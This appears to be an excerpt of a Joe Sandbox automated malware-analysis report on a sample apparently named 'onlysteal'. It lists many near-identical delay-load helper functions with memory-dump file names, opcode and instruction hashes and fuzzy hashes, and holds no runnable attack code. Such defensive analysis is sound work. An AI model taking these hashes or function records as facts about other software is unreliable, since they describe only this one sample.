                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 3453116b7928002627d596c2812e587633f1ac8d085f07d3aa21bc70f8f4d90c
                                      • Instruction ID: b4aced1946a4d7dddf3985457341c16d6a21df49e8ae04abc74596c42819b7be
                                      • Opcode Fuzzy Hash: 3453116b7928002627d596c2812e587633f1ac8d085f07d3aa21bc70f8f4d90c
                                      • Instruction Fuzzy Hash: 60B012E12B8000AC3E4CB1051D06D3B010DD0C5F20331403EF80EC0090DC807E710971
                                      Function 0024E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: acb9a39d90c026795d98f4ac019a8bfb137c35681e0c241e92f96946df222f77
                                      • Instruction ID: aca73b70a68ca02f41e267c3c5a24ee37263625e00c7297fa212dde700fbf1dd
                                      • Opcode Fuzzy Hash: acb9a39d90c026795d98f4ac019a8bfb137c35681e0c241e92f96946df222f77
                                      • Instruction Fuzzy Hash: 3DB012E12B8000AC3E4CB1061C06D3B010DE0C5F20331403EF80EC00A0D8807D700971
                                      Function 0024E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 2070daab67b2fec27fd881b2aaaae8bd9fefa633648f1afcba87024e51843e78
                                      • Instruction ID: e741d63851e5d8332b5eb111c2dd2125d1666c1f3e8211e4d8d990f046574846
                                      • Opcode Fuzzy Hash: 2070daab67b2fec27fd881b2aaaae8bd9fefa633648f1afcba87024e51843e78
                                      • Instruction Fuzzy Hash: C2B012D23B8140BC3E8CB2051C02C3B010DD0C5B10331813FF80EC0190D8807CB40971
                                      Function 0024E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: d062311ec941b6fc4b5c51a93058b05f4002fed8f96dbcbaad0fef2ae4094330
                                      • Instruction ID: 11c2446ca32b959301e5407b56bc5aa2a429f2be6f0fe600c3226ab8a0d9179b
                                      • Opcode Fuzzy Hash: d062311ec941b6fc4b5c51a93058b05f4002fed8f96dbcbaad0fef2ae4094330
                                      • Instruction Fuzzy Hash: E3B012D22BC000AC3E4CB2051D02C3B010DD0C5B10331803EF80EC0190DC907D790971
                                      Function 0024E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: f203b90b6bd65c064f26c0bc2f7c86a827cc92ec2d652d2994378dbf57792d2a
                                      • Instruction ID: 4351f9cf9ffd1448d11b3503d7d35a4459499486f491294e177185877280a008
                                      • Opcode Fuzzy Hash: f203b90b6bd65c064f26c0bc2f7c86a827cc92ec2d652d2994378dbf57792d2a
                                      • Instruction Fuzzy Hash: 6FB012E52B8000BC3E4CB1051C06D3B010DD0C6F20331803EFC0EC0090D880BD700971
                                      Function 0024E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 4549a0c1758fb9ffafef7f695b0edcaab194711f900b9d5959638418c5a0889f
                                      • Instruction ID: e6ad4555371658d4ebec2949c476a107852e40f63796994cf6756f61bc621105
                                      • Opcode Fuzzy Hash: 4549a0c1758fb9ffafef7f695b0edcaab194711f900b9d5959638418c5a0889f
                                      • Instruction Fuzzy Hash: 2AB012D12B9040AC3E4CB1051C02C3F014EE4C5B10331403EF80FC00A0D8807C700971
                                      Function 0024E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 5462b4e6d707bdd2353ad625cc641a24040095f94d9a9b04af4265586bdf7ed1
                                      • Instruction ID: dfa6c919ac30cc687aa180d8309c628a3ba72c1f49b03f15e541362bae521b77
                                      • Opcode Fuzzy Hash: 5462b4e6d707bdd2353ad625cc641a24040095f94d9a9b04af4265586bdf7ed1
                                      • Instruction Fuzzy Hash: 5DB012D52B8000AC3E4CB1151C02C3B014DE0C6B10331803EFC0EC0090D980BC700D71
                                      Function 0024E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 60d04f25e85165c33e881e793598df8ecb73f6d07699403ea67c4a200cae99e6
                                      • Instruction ID: dff32eee2143b1b1f25167c90e9fe2a621cfd186a7a446ee325853fd7c09a4a3
                                      • Opcode Fuzzy Hash: 60d04f25e85165c33e881e793598df8ecb73f6d07699403ea67c4a200cae99e6
                                      • Instruction Fuzzy Hash: 60B012D52B9040AC3E4CB1051C02C3B010ED0C6B10331803EFC0EC0090D880BC700971
                                      Function 0024E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: df5a04233d50c177cbb124190d1c4fb9ab19810ffecba6516718a2cfb9ed3cea
                                      • Instruction ID: 8e10474bfac1055699bf5017dc3d0145c8cbb900804188cba9135dda7c05238b
                                      • Opcode Fuzzy Hash: df5a04233d50c177cbb124190d1c4fb9ab19810ffecba6516718a2cfb9ed3cea
                                      • Instruction Fuzzy Hash: 59B012E12B9140BC3E8CB2051C02C3B010ED0C5B10331413FF80EC0090D8807CB40971
                                      Function 0024E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 2433ee74f663b218f54e007adc0ea03d5848ee6dcc2ca3c8d6d7b9a62cb300e3
                                      • Instruction ID: f50e579ce03641d34b1789ec66714341bb6fb898964e054ba61413182786262f
                                      • Opcode Fuzzy Hash: 2433ee74f663b218f54e007adc0ea03d5848ee6dcc2ca3c8d6d7b9a62cb300e3
                                      • Instruction Fuzzy Hash: D2B012E12B8000AC3E4CB1051D02C3B018DE0C5B10331403EF80EC0090DC807D710D71
                                      Function 0024E528 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: 41a55f805d6d277dde7c3054c84eac18dc05ea8c347049a85681f8e8cc0d365a
                                      • Instruction ID: 20a5414e7a4014275eca7ee1fa0fb1be29440e900d4a732ffdac9b9d6d00b2cb
                                      • Opcode Fuzzy Hash: 41a55f805d6d277dde7c3054c84eac18dc05ea8c347049a85681f8e8cc0d365a
                                      • Instruction Fuzzy Hash: A2B012C16780407C3E0CB2095D02C3B450DD4C2F10371802EF405C0080E8810C710932
                                      Function 0024E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: b4be0adbf1501959438b57869ef6b69912398fcf0015f947872a96f33e2d9d7e
                                      • Instruction ID: 0113894920b6076de309cc0e899167fd6497d6e7a392198ddd4d9963e276c0ef
                                      • Opcode Fuzzy Hash: b4be0adbf1501959438b57869ef6b69912398fcf0015f947872a96f33e2d9d7e
                                      • Instruction Fuzzy Hash: B2B012C16780007C3E0C72259C06C3B010DE4C2F10371403EF451C0481A8800D740832
                                      Function 0024E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: 1860e7f43de3f586f1849434f4d67bc08885aaa8f6387cfdce442383809397fa
                                      • Instruction ID: 19947729fd3bff9ce9c4298f972e431c20000640403d452e3ed915c9a0658871
                                      • Opcode Fuzzy Hash: 1860e7f43de3f586f1849434f4d67bc08885aaa8f6387cfdce442383809397fa
                                      • Instruction Fuzzy Hash: 7AB012C16781007C3F0CB2099C03C3B010DD4C2F10371422EF406C0080E8800CB40936
                                      Function 0024E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: f18b350ae688fc3eefd17dd63a8b8ca913eb6bc4729cff1cddbf786f2f5c1188
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: f18b350ae688fc3eefd17dd63a8b8ca913eb6bc4729cff1cddbf786f2f5c1188
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: ca2927ba4446b4d0a189dd9ca6bb44bf72114162cd7543de96845fc6adee5124
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: ca2927ba4446b4d0a189dd9ca6bb44bf72114162cd7543de96845fc6adee5124
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
